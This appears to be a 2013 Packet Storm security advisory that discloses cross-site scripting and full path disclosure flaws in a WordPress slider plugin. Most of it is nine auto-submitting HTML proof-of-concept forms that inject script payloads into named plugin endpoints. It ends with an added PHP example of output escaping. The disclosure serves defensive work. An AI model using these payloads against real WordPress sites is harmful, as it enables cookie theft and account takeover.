LBG Zoom In/Out Effect Slider Cross Site Scripting

2013-11-05T00:00:00
ID PACKETSTORM:123914
Type packetstorm
Reporter MustLive
Modified 2013-11-05T00:00:00

Description

                                        
Hello list!
  
I want to inform you about vulnerabilities in the LBG Zoom In/Out Effect Slider
plugin for WordPress. These are in addition to one XSS in this plugin, which was
disclosed earlier
(http://packetstormsecurity.com/files/123367/WordPress-LBG-Zoominoutslider-Cross-Site-Scripting.html).
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.   
Altogether 26 new holes: 24 XSS and 2 FPD vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
All versions of the LBG Zoom In/Out Effect Slider plugin for WordPress are
vulnerable.
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS in files add_playlist_record.php and settings_form.php.  
  
LBG Zoominoutslider XSS.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="img"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-2.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-link"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-3.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="thumbnail"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-4.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="alt_text"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-5.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="content"   
value='</textarea><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-6.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-initialZoom"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-7.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-finalZoom"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-8.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-duration"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-9.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/settings_form.php"   
method="post">  
<input type="hidden" name="width"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="height"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="autoPlay"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="initialZoom"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="finalZoom"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="duration"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="durationIEfix"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="numberOfThumbsPerScreen"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="thumbsOnMarginTop"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="thumbsWrapperMarginTop"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleRadius"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleLineWidth"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleColor"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleAlpha"   
value='</script><script>alert(document.cookie)</script>'>  
<input type="hidden" name="behindCircleColor"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="behindCircleAlpha"   
value='</script><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/plugins/lbg_zoominoutslider/tpl/banners.php  
  
http://site/wp-content/plugins/lbg_zoominoutslider/tpl/playlist.php  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
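
The payloads above imply three output contexts: an HTML attribute value (`">`), a textarea body (`</textarea>`) and an inline script block (`</script>`). The following added example, which is not the plugin's code or the advisory author's, shows context-appropriate encoding for each in plain PHP; the template markup, the function names and the way circleAlpha is emitted are assumptions.

```php
<?php
// Added example: hypothetical template fragments, not the plugin's code.
// In a real WordPress template the first statement would be
//   defined('ABSPATH') || exit;
// so that direct requests to files under tpl/ (the request shape of the
// PoC forms and the FPD URLs) stop immediately.

// Constructed input: one payload per output context seen in the advisory.
$post = [
    'img'         => '"><script>alert(document.cookie)</script>',
    'content'     => '</textarea><script>alert(document.cookie)</script>',
    'circleAlpha' => '</script><script>alert(document.cookie)</script>',
];

// HTML attribute values and textarea bodies: encode & < > " '.
// WordPress equivalents are esc_attr() and esc_textarea().
function h(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Values placed inside <script>: emit a JSON string literal with
// < > & ' " hex-escaped, so "</script>" cannot end the block.
// The WordPress wrapper for json_encode() is wp_json_encode().
function js(string $v): string
{
    return json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE);
}

// Before: request values concatenated straight into the markup.
function render_unescaped(array $p): string
{
    return '<input name="img" value="' . $p['img'] . "\">\n"
        . '<textarea name="content">' . $p['content'] . "</textarea>\n"
        . '<script>var circleAlpha = "' . $p['circleAlpha'] . "\";</script>\n";
}

// After: each value encoded for the context it lands in.
function render_escaped(array $p): string
{
    return '<input name="img" value="' . h($p['img']) . "\">\n"
        . '<textarea name="content">' . h($p['content']) . "</textarea>\n"
        . '<script>var circleAlpha = ' . js($p['circleAlpha']) . ";</script>\n";
}

echo "--- unescaped ---\n", render_unescaped($post);
echo "--- escaped ---\n", render_escaped($post);
```

Running it with the PHP CLI prints both renderings, so the unescaped and encoded markup can be compared context by context.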
  